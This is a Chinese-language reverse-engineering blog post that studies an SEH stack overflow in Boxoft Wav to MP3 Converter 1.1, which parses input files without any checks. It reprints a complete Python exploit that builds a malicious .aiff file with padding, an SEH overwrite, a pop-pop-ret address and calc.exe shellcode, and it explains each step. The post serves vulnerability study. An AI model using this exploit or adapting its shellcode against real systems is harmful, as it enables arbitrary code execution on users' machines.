<!DOCTYPE html>












  


<html class="theme-next pisces use-motion" lang="zh-Hans">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2"/>
<meta name="theme-color" content="#222">












<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />






















<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=6.3.0" rel="stylesheet" type="text/css" />


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=6.3.0">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=6.3.0">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=6.3.0">


  <link rel="mask-icon" href="/images/logo.svg?v=6.3.0" color="#222">









<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Pisces',
    version: '6.3.0',
    sidebar: {"position":"right","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: false,
    fastclick: false,
    lazyload: false,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>


  




  <meta name="description" content="概述这个是我在吾爱破解看到的一个漏洞，感觉不显得那么复杂，就顺手拿过来研究一下seh的利用。这里写一写我的研究流程，文件在后续连接给出。当然要不了解seh的话还是看一看seh详细介绍即可，文章写得非常好。这个软件功能是一个吧wav文件转换成一个MP3文件，漏洞产生的主要原因是没有对输入的文件做任何的检查，拿过来就直接当wav文件解析了，从而导致的栈溢出。 研究流程 因为是解析文件，所以直接找到cr">
<meta property="og:type" content="article">
<meta property="og:title" content="Boxoft Wav to MP3 (freeware)中的SEH漏洞利用">
<meta property="og:url" content="https://foyjog.github.io/2018/01/18/Boxoft-Wav-to-MP3-freeware-中的SEH漏洞利用/index.html">
<meta property="og:site_name" content="foyjog">
<meta property="og:description" content="概述这个是我在吾爱破解看到的一个漏洞，感觉不显得那么复杂，就顺手拿过来研究一下seh的利用。这里写一写我的研究流程，文件在后续连接给出。当然要不了解seh的话还是看一看seh详细介绍即可，文章写得非常好。这个软件功能是一个吧wav文件转换成一个MP3文件，漏洞产生的主要原因是没有对输入的文件做任何的检查，拿过来就直接当wav文件解析了，从而导致的栈溢出。 研究流程 因为是解析文件，所以直接找到cr">
<meta property="og:locale" content="zh-Hans">
<meta property="og:image" content="https://foyjog.github.io/img/1801191.png">
<meta property="og:updated_time" content="2018-07-03T08:17:44.160Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="Boxoft Wav to MP3 (freeware)中的SEH漏洞利用">
<meta name="twitter:description" content="概述这个是我在吾爱破解看到的一个漏洞，感觉不显得那么复杂，就顺手拿过来研究一下seh的利用。这里写一写我的研究流程，文件在后续连接给出。当然要不了解seh的话还是看一看seh详细介绍即可，文章写得非常好。这个软件功能是一个吧wav文件转换成一个MP3文件，漏洞产生的主要原因是没有对输入的文件做任何的检查，拿过来就直接当wav文件解析了，从而导致的栈溢出。 研究流程 因为是解析文件，所以直接找到cr">
<meta name="twitter:image" content="https://foyjog.github.io/img/1801191.png">



  <link rel="alternate" href="/atom.xml" title="foyjog" type="application/atom+xml" />




  <link rel="canonical" href="https://foyjog.github.io/2018/01/18/Boxoft-Wav-to-MP3-freeware-中的SEH漏洞利用/"/>



<script type="text/javascript" id="page.configurations">
  CONFIG.page = {
    sidebar: "",
  };
</script>

  <title>Boxoft Wav to MP3 (freeware)中的SEH漏洞利用 | foyjog</title>
  









  <noscript>
  <style type="text/css">
    .use-motion .motion-element,
    .use-motion .brand,
    .use-motion .menu-item,
    .sidebar-inner,
    .use-motion .post-block,
    .use-motion .pagination,
    .use-motion .comments,
    .use-motion .post-header,
    .use-motion .post-body,
    .use-motion .collection-title { opacity: initial; }

    .use-motion .logo,
    .use-motion .site-title,
    .use-motion .site-subtitle {
      opacity: initial;
      top: initial;
    }

    .use-motion {
      .logo-line-before i { left: initial; }
      .logo-line-after i { right: initial; }
    }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-right page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">foyjog</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
    
      
        <p class="site-subtitle">reversing engineer</p>
      
    
  </div>

  <div class="site-nav-toggle">
    <button aria-label="Toggle navigation bar">
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>



<nav class="site-nav">
  
    <ul id="menu" class="menu">
      
        
        
        
          
          <li class="menu-item menu-item-home">
    <a href="/" rel="section">
      <i class="menu-item-icon fa fa-fw fa-home"></i> <br />Home</a>
  </li>
        
        
        
          
          <li class="menu-item menu-item-archives">
    <a href="/archives/" rel="section">
      <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />Archives</a>
  </li>

      
      
    </ul>
  

  

  
</nav>



  



</div>
    </header>

    


    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          
            

          
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="https://foyjog.github.io/2018/01/18/Boxoft-Wav-to-MP3-freeware-中的SEH漏洞利用/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="foyjog">
      <meta itemprop="description" content="email:foyjog@163.com">
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="foyjog">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">Boxoft Wav to MP3 (freeware)中的SEH漏洞利用
              
            
          </h1>
        

        <div class="post-meta">
          <span class="post-time">

            
            
            

            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">Posted on</span>
              

              
                
              

              <time title="Created: 2018-01-18 23:36:44" itemprop="dateCreated datePublished" datetime="2018-01-18T23:36:44+08:00">2018-01-18</time>
            

            
              

              
                
                <span class="post-meta-divider">|</span>
                

                <span class="post-meta-item-icon">
                  <i class="fa fa-calendar-check-o"></i>
                </span>
                
                  <span class="post-meta-item-text">Edited on</span>
                
                <time title="Modified: 2018-07-03 16:17:44" itemprop="dateModified" datetime="2018-07-03T16:17:44+08:00">2018-07-03</time>
              
            
          </span>

          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h3 id="概述"><a href="#概述" class="headerlink" title="概述"></a>概述</h3><p>这个是我在吾爱破解看到的一个漏洞，感觉不显得那么复杂，就顺手拿过来研究一下seh的利用。这里写一写我的研究流程，文件在后续连接给出。<br>当然要不了解seh的话还是看一看<a href="http://blog.csdn.net/hustd10/article/details/51167902" target="_blank" rel="noopener">seh详细介绍</a>即可，文章写得非常好。<br>这个软件功能是一个吧wav文件转换成一个MP3文件，漏洞产生的主要原因是没有对输入的文件做任何的检查，拿过来就直接当wav文件解析了，从而导致的栈溢出。</p>
<h3 id="研究流程"><a href="#研究流程" class="headerlink" title="研究流程"></a>研究流程</h3><ol>
<li>因为是解析文件，所以直接找到createfile函数和readfile函数进行断点，运行程序，程序中断。</li>
<li>在readfile函数中向上回溯代码，找到程序对输入文件做处理的关键代码<br>0x4ba820处代码如下：<figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">while</span> ( <span class="number">2</span> )</span><br><span class="line"> &#123;</span><br><span class="line">   result = v2;</span><br><span class="line">   <span class="keyword">switch</span> ( v2 )</span><br><span class="line">   &#123;</span><br><span class="line">     <span class="keyword">case</span> <span class="number">0</span>:</span><br><span class="line">       <span class="keyword">if</span> ( (<span class="keyword">unsigned</span> __int8)sub_4B9C6C(v4, <span class="string">"RIFF"</span>) )</span><br><span class="line">       &#123;</span><br><span class="line">         result = (*(<span class="keyword">int</span> (__fastcall **)(<span class="keyword">signed</span> <span class="keyword">int</span>, <span class="keyword">char</span> *))(**(_DWORD **)(v1 + <span class="number">96</span>) + <span class="number">12</span>))(<span class="number">4</span>, &amp;v30[v3]);</span><br><span class="line">         v3 += <span class="number">4</span>;</span><br><span class="line">         v2 = <span class="number">1</span>;</span><br><span class="line">       &#125;</span><br><span class="line">       <span class="keyword">else</span></span><br><span class="line">       &#123;</span><br><span class="line">         result = (*(<span class="keyword">int</span> (__fastcall **)(<span class="keyword">signed</span> <span class="keyword">int</span>, <span class="keyword">char</span> *))(**(_DWORD **)(v1 + <span class="number">96</span>) + <span class="number">12</span>))(<span class="number">1</span>, &amp;v30[v3++]);</span><br><span class="line">       &#125;</span><br><span class="line">       <span class="keyword">goto</span> LABEL_55;</span><br><span class="line">     <span class="keyword">case</span> <span class="number">1</span>:</span><br><span class="line">       <span class="keyword">if</span> ( (<span class="keyword">unsigned</span> __int8)sub_4B9C6C(v4, <span class="string">"WAVE"</span>) )</span><br><span class="line">       &#123;</span><br><span class="line">         result = (*(<span class="keyword">int</span> (__fastcall **)(<span class="keyword">signed</span> <span class="keyword">int</span>, <span class="keyword">char</span> *))(**(_DWORD **)(v1 + <span class="number">96</span>) + <span class="number">12</span>))(<span class="number">4</span>, &amp;v30[v3]);</span><br><span class="line">         v3 += <span class="number">4</span>;</span><br><span class="line">         v2 = <span class="number">2</span>;</span><br><span class="line">       &#125;</span><br><span class="line">       <span class="keyword">else</span></span><br></pre></td></tr></table></figure>
</li>
</ol>
<p>wav文件的格式头：第一至第四个字母为“RIFF”<br>所以代码做的功能如下：</p>
<ul>
<li>按照字节读取文件首行四个字符</li>
<li>如果是RIFF的话就case++，转入其他的case处理，如果不是RIFF，那么往后读取一个字节，继续和RIFF比较<br>这段代码就是没有对文件进行一个处理而导致了栈溢出，跟进代码构造payload后利用SEH链便能弹出计算器，payload如下：<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">### Exploit Title: Boxoft WAV to MP3 Converter 1.1 - SEH Buffer Overflow</span></span><br><span class="line"><span class="comment">### Date: 10/13/2015</span></span><br><span class="line"><span class="comment">### Exploit Author: ArminCyber</span></span><br><span class="line"><span class="comment">### Contact: Armin.Exploit@gmail.com</span></span><br><span class="line"><span class="comment">### Version: 1.1</span></span><br><span class="line"><span class="comment">### Tested on: XP SP3 EN</span></span><br><span class="line"><span class="comment">### Description: A  malicious .aiff file cause this vulnerability.</span></span><br><span class="line"><span class="comment">### category: Local Exploit</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">f = open(<span class="string">"malicious.aiff"</span>, <span class="string">"w"</span>)</span><br><span class="line"></span><br><span class="line">f.write(<span class="string">"A"</span>*<span class="number">4132</span>)</span><br><span class="line"></span><br><span class="line">f.write(<span class="string">"\xeb\x06\x90\x90"</span>)</span><br><span class="line"></span><br><span class="line">f.write(<span class="string">"\xa4\x43\x40\x00"</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment">### Shelcode:</span></span><br><span class="line"><span class="comment">### windows/exec - 277 bytes</span></span><br><span class="line"><span class="comment">### CMD=calc.exe</span></span><br><span class="line">f.write(<span class="string">"\x90"</span>*<span class="number">20</span>)</span><br><span class="line">f.write(<span class="string">"\xba\xd5\x31\x08\x38\xdb\xcb\xd9\x74\x24\xf4\x5b\x29\xc9\xb1"</span></span><br><span class="line"><span class="string">"\x33\x83\xc3\x04\x31\x53\x0e\x03\x86\x3f\xea\xcd\xd4\xa8\x63"</span></span><br><span class="line"><span class="string">"\x2d\x24\x29\x14\xa7\xc1\x18\x06\xd3\x82\x09\x96\x97\xc6\xa1"</span></span><br><span class="line"><span class="string">"\x5d\xf5\xf2\x32\x13\xd2\xf5\xf3\x9e\x04\x38\x03\x2f\x89\x96"</span></span><br><span class="line"><span class="string">"\xc7\x31\x75\xe4\x1b\x92\x44\x27\x6e\xd3\x81\x55\x81\x81\x5a"</span></span><br><span class="line"><span class="string">"\x12\x30\x36\xee\x66\x89\x37\x20\xed\xb1\x4f\x45\x31\x45\xfa"</span></span><br><span class="line"><span class="string">"\x44\x61\xf6\x71\x0e\x99\x7c\xdd\xaf\x98\x51\x3d\x93\xd3\xde"</span></span><br><span class="line"><span class="string">"\xf6\x67\xe2\x36\xc7\x88\xd5\x76\x84\xb6\xda\x7a\xd4\xff\xdc"</span></span><br><span class="line"><span class="string">"\x64\xa3\x0b\x1f\x18\xb4\xcf\x62\xc6\x31\xd2\xc4\x8d\xe2\x36"</span></span><br><span class="line"><span class="string">"\xf5\x42\x74\xbc\xf9\x2f\xf2\x9a\x1d\xb1\xd7\x90\x19\x3a\xd6"</span></span><br><span class="line"><span class="string">"\x76\xa8\x78\xfd\x52\xf1\xdb\x9c\xc3\x5f\x8d\xa1\x14\x07\x72"</span></span><br><span class="line"><span class="string">"\x04\x5e\xa5\x67\x3e\x3d\xa3\x76\xb2\x3b\x8a\x79\xcc\x43\xbc"</span></span><br><span class="line"><span class="string">"\x11\xfd\xc8\x53\x65\x02\x1b\x10\x99\x48\x06\x30\x32\x15\xd2"</span></span><br><span class="line"><span class="string">"\x01\x5f\xa6\x08\x45\x66\x25\xb9\x35\x9d\x35\xc8\x30\xd9\xf1"</span></span><br><span class="line"><span class="string">"\x20\x48\x72\x94\x46\xff\x73\xbd\x24\x9e\xe7\x5d\x85\x05\x80"</span></span><br><span class="line"><span class="string">"\xc4\xd9"</span>)</span><br><span class="line">f.write(<span class="string">"\x90"</span>*<span class="number">20</span>)</span><br><span class="line"></span><br><span class="line">f.close()</span><br></pre></td></tr></table></figure>
</li>
</ul>
<p>SEH链的结构如下：<br><img src="/img/1801191.png" alt="SEH链结构图"><br>其中f.write(“\xeb\x06\x90\x90”)是next seh指针，汇编为jmp 6，即跳过6个字节，刚好能滑入shellcode中。<br>其中f.write(“\xa4\x43\x40\x00”)的代码为<br><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">CODE:<span class="number">004043</span>A4                 push    offset Caption  ; <span class="string">"Error"</span></span><br><span class="line">CODE:<span class="number">004043</span>A9                 push    offset Text     ; <span class="string">"Runtime error     at 00000000"</span></span><br><span class="line">CODE:<span class="number">004043</span>AE                 push    <span class="number">0</span>               ; hWnd</span><br><span class="line">CODE:<span class="number">004043B</span>0                 call    MessageBoxA</span><br><span class="line">CODE:<span class="number">004043B</span>5</span><br><span class="line">CODE:<span class="number">004043B</span>5 loc_4043B5:                             ; CODE XREF: sub_404338+<span class="number">68</span>↑j</span><br><span class="line">CODE:<span class="number">004043B</span>5                 pop     edx</span><br><span class="line">CODE:<span class="number">004043B</span>6                 retn</span><br></pre></td></tr></table></figure></p>
<p>作用为pop，pop，ret到\xeb\x06\x90\x90代码，从而执行shellcode</p>
<h3 id="文件链接"><a href="#文件链接" class="headerlink" title="文件链接"></a>文件链接</h3><p>链接：<a href="https://pan.baidu.com/s/1o9nVXZs" target="_blank" rel="noopener">https://pan.baidu.com/s/1o9nVXZs</a> 密码：khfy<br>文章链接参考：<a href="https://www.52pojie.cn/thread-456209-1-1.html" target="_blank" rel="noopener">https://www.52pojie.cn/thread-456209-1-1.html</a></p>

      
    </div>

    

    
    
    

    

    

    

    <footer class="post-footer">
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2017/12/25/00ctf-reverse-writeup/" rel="next" title="00ctf-reverse-writeup">
                <i class="fa fa-chevron-left"></i> 00ctf-reverse-writeup
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2018/01/23/34c3ctf中vim题目详解/" rel="prev" title="34c3ctf中vim题目详解">
                34c3ctf中vim题目详解 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            Table of Contents
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            Overview
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <p class="site-author-name" itemprop="name">foyjog</p>
              <p class="site-description motion-element" itemprop="description">email:foyjog@163.com</p>
          </div>

          
            <nav class="site-state motion-element">
              
                <div class="site-state-item site-state-posts">
                
                  <a href="/archives/">
                
                    <span class="site-state-item-count">18</span>
                    <span class="site-state-item-name">posts</span>
                  </a>
                </div>
              

              

              
            </nav>
          

          
            <div class="feed-link motion-element">
              <a href="/atom.xml" rel="alternate">
                <i class="fa fa-rss"></i>
                RSS
              </a>
            </div>
          

          
            <div class="links-of-author motion-element">
              
                <span class="links-of-author-item">
                  <a href="https://github.com/foyjog" target="_blank" title="GitHub"><i class="fa fa-fw fa-github"></i>GitHub</a>
                  
                </span>
              
                <span class="links-of-author-item">
                  <a href="mailto:foyjog@163.com" target="_blank" title="E-Mail"><i class="fa fa-fw fa-envelope"></i>E-Mail</a>
                  
                </span>
              
            </div>
          

          
          

          
          

          
            
          
          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-3"><a class="nav-link" href="#概述"><span class="nav-number">1.</span> <span class="nav-text">概述</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#研究流程"><span class="nav-number">2.</span> <span class="nav-text">研究流程</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#文件链接"><span class="nav-number">3.</span> <span class="nav-text">文件链接</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2018</span>
  <span class="with-love" id="animate">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">foyjog</span>

  

  
</div>




  <div class="powered-by">Powered by <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a> v3.4.4</div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">Theme &mdash; <a class="theme-link" target="_blank" href="https://theme-next.org">NexT.Pisces</a> v6.3.0</div>




        








        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>


























  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=6.3.0"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=6.3.0"></script>



  
  


  <script type="text/javascript" src="/js/src/affix.js?v=6.3.0"></script>

  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=6.3.0"></script>



  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=6.3.0"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=6.3.0"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=6.3.0"></script>



  



  





  










  





  

  

  

  

  
  

  

  

  

  

  

</body>
</html>
